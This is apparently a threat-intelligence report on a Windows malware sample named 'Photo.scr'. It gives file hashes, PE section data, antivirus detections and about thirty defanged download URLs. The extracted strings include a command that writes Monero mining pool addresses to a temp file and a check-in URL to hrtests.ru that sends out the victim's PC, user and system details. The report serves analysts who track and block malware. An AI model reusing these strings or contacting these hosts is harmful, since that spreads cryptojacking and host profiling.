Photo.scr

First submission 2024-06-27 13:02:05 Last sumbission 2024-10-06 19:37:26

File details

File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Mime type: application/x-dosexec
File size: 1541.5 KB (1578496 bytes)
Compile time: 2016-02-06 22:24:54
MD5: aba2d86ed17f587eb6d57e6c75f64f05
SHA1: aeccba64f4dd19033ac2226b4445faac05c88b76
SHA256: 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d
Import Hash : 87e83bda436138fd7844ecd76decc70d
Sections 9 .text .data .rdata .eh_fram .bss .idata .CRT .tls .rsrc
Directories 3 import resource tls

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 70/78 VT report date: 2024-06-26 01:38:44
Malware Type 3 miner trojan worm
Threat Type 3 agentb crytes btdr

URLs, FQDN and IP indicators 30

URL Host (FQDN/IP) Date Added
hXXp://73.56.250.48:81/Photo.scr VirusTotal Report 73.56.250.48 VirusTotal Report 2024-10-06 19:37:29
hXXp://49.232.126.36:9000/Photo.scr VirusTotal Report 49.232.126.36 VirusTotal Report 2024-10-06 19:36:22
hXXp://150.158.25.244:9000/Photo.scr VirusTotal Report 150.158.25.244 VirusTotal Report 2024-10-06 19:34:10
hXXp://31.214.180.12:81/Photo.scr VirusTotal Report 31.214.180.12 VirusTotal Report 2024-10-06 19:18:09
hXXp://125.31.68.24/Photo.scr VirusTotal Report 125.31.68.24 VirusTotal Report 2024-10-06 19:17:07
hXXp://43.132.12.146:9000/Photo.scr VirusTotal Report 43.132.12.146 VirusTotal Report 2024-10-06 19:15:07
hXXp://121.150.232.10:8602/Photo.scr VirusTotal Report 121.150.232.10 VirusTotal Report 2024-10-06 19:14:10
hXXp://211.220.36.213/Photo.scr VirusTotal Report 211.220.36.213 VirusTotal Report 2024-10-06 19:11:11
hXXp://111.241.97.88:8083/Photo.scr VirusTotal Report 111.241.97.88 VirusTotal Report 2024-10-06 19:08:13
hXXp://187.144.164.59/Photo.scr VirusTotal Report 187.144.164.59 VirusTotal Report 2024-10-06 19:04:12
hXXp://178.61.160.6:5001/Photo.scr VirusTotal Report 178.61.160.6 VirusTotal Report 2024-10-06 19:03:10
hXXp://123.117.136.97:9000/Photo.scr VirusTotal Report 123.117.136.97 VirusTotal Report 2024-10-06 18:43:10
hXXp://68.225.217.95:85/Photo.scr VirusTotal Report 68.225.217.95 VirusTotal Report 2024-10-06 18:37:11
hXXp://184.148.96.148/Photo.scr VirusTotal Report 184.148.96.148 VirusTotal Report 2024-10-06 18:34:11
hXXp://14.42.14.216:8602/Photo.scr VirusTotal Report 14.42.14.216 VirusTotal Report 2024-10-06 18:31:14
hXXp://187.225.246.173/Photo.scr VirusTotal Report 187.225.246.173 VirusTotal Report 2024-10-06 18:30:17
hXXp://43.132.13.252:9000/Photo.scr VirusTotal Report 43.132.13.252 VirusTotal Report 2024-10-06 18:26:08
hXXp://185.134.229.43:81/Photo.scr VirusTotal Report 185.134.229.43 VirusTotal Report 2024-10-06 18:23:47
hXXp://178.60.25.240:81/Photo.scr VirusTotal Report 178.60.25.240 VirusTotal Report 2024-10-06 18:20:21
hXXp://181.36.153.151:81/Photo.scr VirusTotal Report 181.36.153.151 VirusTotal Report 2024-10-06 16:20:13
hXXp://113.156.110.218:81/Photo.scr VirusTotal Report 113.156.110.218 VirusTotal Report 2024-10-06 16:17:13
hXXp://80.11.228.144:10140/Photo.scr VirusTotal Report 80.11.228.144 VirusTotal Report 2024-10-06 16:14:25
hXXp://72.219.74.233:8080/Photo.scr VirusTotal Report 72.219.74.233 VirusTotal Report 2024-10-06 15:58:10
hXXp://211.195.25.38:8602/Photo.scr VirusTotal Report 211.195.25.38 VirusTotal Report 2024-10-06 15:57:16
hXXp://138.188.39.245/Photo.scr VirusTotal Report 138.188.39.245 VirusTotal Report 2024-10-06 15:56:18
hXXp://68.108.119.30:22420/Photo.scr VirusTotal Report 68.108.119.30 VirusTotal Report 2024-10-06 15:39:18
hXXp://75.8.215.99:41791/Photo.scr VirusTotal Report 75.8.215.99 VirusTotal Report 2024-10-06 15:38:13
hXXp://24.12.168.19:8081/Photo.scr VirusTotal Report 24.12.168.19 VirusTotal Report 2024-10-06 15:35:12
hXXp://76.68.62.153/Photo.scr VirusTotal Report 76.68.62.153 VirusTotal Report 2024-10-06 15:20:10
hXXp://81.218.175.244/Photo.scr VirusTotal Report 81.218.175.244 VirusTotal Report 2024-10-06 15:18:09

PE Sections 4 suspicious

Name VAddress VSize Size SHA1 MD5 Suspicious
.text 0x1000 0x137d0 79872 e4f3b05c2cb72a3a9bb4e5bacd63788c2b5490c5 39157f6164a3e966d93a9e54bfd55e5d
.data 0x15000 0x464 1536 256e5fd77471c28593995ca3c04c6bd381484a7e 4fc8adf7c869a3dc80426fcded1e27c6
.rdata 0x16000 0x2814 10752 404f81af522150235967c7ea3605dc7ec5deff1d 01869b2ba05653efc7e6e179ffc28524
.eh_fram 0x19000 0x3f8 1024 38077d7eac73791ed56a875f762607f420a30eea a5fe82dca0728310905bb6a8e4d0bc89
.bss 0x1a000 0x4b4c 0 da39a3ee5e6b4b0d3255bfef95601890afd80709 d41d8cd98f00b204e9800998ecf8427e
.idata 0x1f000 0xd98 3584 851ac9544791955aa0578aca1df9a4d4611cedff e5e1e8c03c9fe706cebf7ad22484fd9c
.CRT 0x20000 0x1c 512 017fb7e9f533038de83933b0d5cb232b45bedb9b 9d082062f4e4e509453fecdae3c43c45
.tls 0x21000 0x20 512 997b5806a26eb53fe57011ba617d9de51785c1ee f8afb1bfec2ae1670831e201203150b4
.rsrc 0x22000 0x169230 1479680 7cdf9e1c2ee86aa3d95a06b23898cac34b5e4005 2a2c87b0b8e62eec304b57f76d5904de

PE Resources 3

Name Language Sublanguage Offset Size Data
RT_ICON LANG_ENGLISH SUBLANG_ENGLISH_US 0x2cd34 1128
RT_RCDATA LANG_ENGLISH SUBLANG_ENGLISH_US 0x2d19c 1433600
RT_GROUP_ICON LANG_ENGLISH SUBLANG_ENGLISH_US 0x18b19c 146

Anti debug functions 1

GetLastError

Strings analysis - File found

Text
/c (echo stratum+tcp://mine.moneropool.com:3333& echo stratum+tcp://monero.crypto-pool.fr:3333& echo stratum+tcp://xmr.prohash.net:7777& echo stratum+tcp://pool.minexmr.com:5555)> %TEMP%\pools.txt
Library
ADVAPI32.dll
SHELL32.dll
USER32.dll
WS2_32.dll
MSVCRT.dll
KERNEL32.dll
WININET.dll
libgcj-13.dll

Strings analysis - Possible URLs found 3

http://schemas.microsoft.com/SMI/2005/WindowsSettings
http://%s/test.html?%d
http://hrtests.ru/S.php?ver=24&pc=%s&user=%s&sys=%s&cmd=%s&startup=%s/%s

Import functions

Name Latest seen MD5
Photo.scr 2024-10-06 15:59:11 a550e30cbbd566d93f0b9211a4bd2434
Photo.scr 2024-10-06 19:10:12 1a832c16b6a7dfeb7a6f094ee6d22fc8
Photo.scr 2024-10-06 19:24:32 914fd13923879c49c66fbb775a16958b